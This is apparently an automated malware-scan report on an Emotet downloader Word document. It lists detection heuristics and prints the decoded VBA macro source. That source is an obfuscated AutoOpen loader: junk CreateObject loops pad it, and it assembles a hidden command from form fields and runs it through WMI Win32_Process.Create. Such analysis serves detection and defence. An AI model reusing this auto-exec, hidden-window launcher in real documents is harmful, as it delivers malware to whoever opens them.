Verdict: MALICIOUS
Risk score: 350
Heuristics: 10
- ClamAV: Doc.Downloader.Emotet-10001946-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 6 related findings): Document contains VBA macro code.
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions. Matched line in script: `CreateObject ("M950421")`
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. Matched line in script: `CreateObject ("M950421")`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched line in script: `CreateObject ("M950421")`
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: `Set z36470 = c1690793(GetObject(CVar("winmgmts:Win32_Process")))`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `autoopen()`
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10281 bytes |

SHA-256: 743a7e7dfda2a2565e8fdd26c867834f9c33c3ccf41cdf93f56e900b90fe151f

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "j052640"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "n2581304, 0, 0, MSForms, TextBox"
Attribute VB_Control = "b_0376, 1, 1, MSForms, TextBox"
Attribute VB_Control = "f616817, 2, 2, MSForms, TextBox"
Attribute VB_Control = "A64818, 3, 3, MSForms, TextBox"
Attribute VB_Control = "c_0237_4, 4, 4, MSForms, TextBox"
Attribute VB_Control = "C_4934_0, 5, 5, MSForms, TextBox"
Attribute VB_Name = "u6446562"
Attribute VB_Name = "k6471_8"
Attribute VB_Name = "Y5513012"
Attribute VB_Name = "Q12543"
Attribute VB_Name = "k67426_"
Attribute VB_Name = "b001947"
Attribute VB_Name = "r3273_"
Function c1690793(h292409)
While C53_587 And D081842
CreateObject ("M950421")
CreateObject ("z5578801")
CreateObject ("231383114")
CreateObject ("213146393")
CreateObject ("f107038")
Wend
While P0_58471 And Q52906
CreateObject ("j25_87")
CreateObject ("I861_8")
CreateObject ("483619105")
CreateObject ("688624756")
CreateObject ("P0737212")
Wend
While j43773 And z818476_
CreateObject ("w7_369_0")
CreateObject ("z56819")
CreateObject ("706577816")
CreateObject ("343803285")
CreateObject ("P__5__95")
Wend
Set c1690793 = CVar(h292409)
While X2_54143 And v82302_
CreateObject ("b9020_5")
CreateObject ("v137156")
CreateObject ("560909251")
CreateObject ("777227899")
CreateObject ("o2667707")
Wend
While F83_70 And J07534
CreateObject ("M247284")
CreateObject ("C168_02_")
CreateObject ("5610351")
CreateObject ("963416791")
CreateObject ("I22682")
Wend
While q675499 And i083960
CreateObject ("D92722")
CreateObject ("U085700")
CreateObject ("510324829")
CreateObject ("550402930")
CreateObject ("i89530")
Wend
End Function
Sub _
_
_
autoopen()
On Error Resume Next
While f41960 And w03508
CreateObject ("I2731497")
CreateObject ("K9_908_")
CreateObject ("428548477")
CreateObject ("355109480")
CreateObject ("q6083913")
Wend
While S409_350 And p37303
CreateObject ("v88_801")
CreateObject ("J00123")
CreateObject ("857831959")
CreateObject ("592303265")
CreateObject ("J47206")
Wend
f36620
While q89012 And r5958_
CreateObject ("D_692484")
CreateObject ("k06017")
CreateObject ("677609100")
CreateObject ("931606268")
CreateObject ("i27826")
Wend
While z7611852 And t1014709
CreateObject ("E13633")
CreateObject ("M7_78_1")
CreateObject ("800206652")
CreateObject ("235991737")
CreateObject ("u_33526")
Wend
While S6627_2 And H002448
CreateObject ("l01278")
CreateObject ("Z3367643")
CreateObject ("150489629")
CreateObject ("789683960")
CreateObject ("Y3__8196")
Wend
End Sub
Attribute VB_Name = "T10276"
Function f36620()
On Error Resume Next
While A944561 And Z52565
CreateObject ("Y7427961")
CreateObject ("i5_617")
CreateObject ("510837001")
CreateObject ("217796745")
CreateObject ("U026_4_5")
Wend
While z8647351 And n21719
CreateObject ("w4765347")
CreateObject ("u2_19009")
CreateObject ("333769331")
CreateObject ("749270997")
CreateObject ("r46_2_")
Wend
While L02617 And j0539253
CreateObject ("f3_31698")
CreateObject ("k938_0")
CreateObject ("968909467")
CreateObject ("365247816")
CreateObject ("a759445")
Wend
J57944 = j052640.C_4934_0 + j052640.b_0376 + j052640.C_4934_0 + j052640.f616817 + j052640.C_4934_0 + j052640.C_4934_0 + j052640.A64818 + j052640.C_4934_0 + j052640.C_4934_0 + j052640.c_0237_4 + j052640.C_4934_0 + j052640.n2581304 + j052640.C_4934_0
While h17136_ And F8488805
CreateObject ("k3058313")
CreateObject ("k990434")
CreateObject ("641411210")
CreateObject ("763234801")
CreateObject ("b_6_16")
Wend
While F5964_ And O412822
CreateObject ("z83086")
CreateObject ("k531858")
CreateObject ("362066484")
CreateObject ("442434013")
CreateObject ("d870335")
Wend
Set z36470 = c1690793(GetObject(CVar("winmgmts:Win32_Process")))
While q576__42 And c4829571
CreateObject ("h581025")
CreateObject ("h5679682")
CreateObject ("787795292")
CreateObject ("610506192")
CreateObject ("Y_5975")
Wend
While l846182 And M523151
CreateObject ("L66298")
CreateObject ("b__2752")
CreateObject ("876262853")
CreateObject ("517602965")
CreateObject ("A80426")
Wend
z36470.Create B9963571 + J57944 + z70732_, z_56390, w734090, I4750_5
While i4734_80 And I3903802
CreateObject ("a856067")
CreateObject ("f514892")
CreateObject ("612882573")
CreateObject ("637978611")
CreateObject ("O346795")
Wend
While R5443759 And F33945_
CreateObject ("f883_6_8")
CreateObject ("L9043881")
CreateObject ("940702714")
CreateObject ("959123768")
CreateObject ("V44141")
Wend
While i_6049 And U65842
CreateObject ("l50_17")
CreateObject ("C00_4200")
CreateObject ("633505917")
CreateObject ("817515921")
CreateObject ("J82404")
Wend
End Function
Attribute VB_Name = "i44961"
Public Function w734090()
While J008801_ And i335466
CreateObject ("R_85255")
CreateObject ("f44297")
CreateObject ("43115074")
CreateObject ("986732797")
CreateObject ("U63022")
Wend
While f000505 And G0_1_0
CreateObject ("N83732")
CreateObject ("p93942")
CreateObject ("218665834")
CreateObject ("144606646")
CreateObject ("M3959_44")
Wend
While C72831_1 And R099_58
CreateObject ("G0955347")
CreateObject ("I1_4100")
CreateObject ("728645759")
CreateObject ("758835993")
CreateObject ("j540721")
Wend
Set w734090 = c1690793(GetObject(CVar("winmgmts:Win32_ProcessStartup")))
While C009380 And o712129
CreateObject ("X379__")
CreateObject ("N643952")
CreateObject ("493885488")
CreateObject ("227283560")
CreateObject ("b58240_")
Wend
While q9999_8 And F392790
CreateObject ("z51_5726")
CreateObject ("a73576")
CreateObject ("328081271")
CreateObject ("146380880")
CreateObject ("P69599_")
Wend
While t76070 And c554884
CreateObject ("V87723")
CreateObject ("u95016")
CreateObject ("251263640")
CreateObject ("159975741")
CreateObject ("k7812_17")
Wend
n908_9_ = vbError - vbError
While O35378_1 And z924308
CreateObject ("d0209874")
CreateObject ("Z5_6330")
CreateObject ("122650399")
CreateObject ("524931456")
CreateObject ("h197903")
Wend
While k2_402 And E8984130
CreateObject ("q91033")
CreateObject ("m69822")
CreateObject ("89976527")
CreateObject ("41375022")
CreateObject ("U4_324")
Wend
With w734090
While B0_00384 And t960470
CreateObject ("k2954111")
CreateObject ("W25358")
CreateObject ("267743603")
CreateObject ("860863218")
CreateObject ("n7819_")
Wend
While r503425 And L5570204
CreateObject ("A3_34598")
CreateObject ("K5537218")
CreateObject ("65728174")
CreateObject ("708463808")
CreateObject ("I90611")
Wend
. _
ShowWindow = n908_9_ + n908_9_ + n908_9_ + n908_9_ + n908_9_ + n908_9_ + n908_9_
While j503_17 And c3458235
CreateObject ("l009460")
CreateObject ("t056179")
CreateObject ("812666603")
CreateObject ("926028968")
CreateObject ("t_4468")
Wend
While o98243 And r1149435
CreateObject ("z2016093")
CreateObject ("i79422_1")
CreateObject ("673353660")
CreateObject ("52144376")
CreateObject ("t6528860")
Wend
While K7582086 And O2755120
CreateObject ("X83621")
CreateObject ("q55__663")
CreateObject ("705363984")
CreateObject ("932618134")
CreateObject ("h291_08")
Wend
End With
While Q22_61 And h2218987
CreateObject ("I8503478")
CreateObject ("j286432")
CreateObject ("964493506")
CreateObject ("386471797")
CreateObject ("N0972345")
Wend
While J973_117 And c63993
CreateObject ("F5941692")
CreateObject ("M6_0_23")
CreateObject ("714426587")
CreateObject ("929776296")
CreateObject ("K94523_1")
Wend
While E469809 And j839574
CreateObject ("I15075")
CreateObject ("V295214")
CreateObject ("88903188")
CreateObject ("314176008")
CreateObject ("h4632670")
Wend
End Function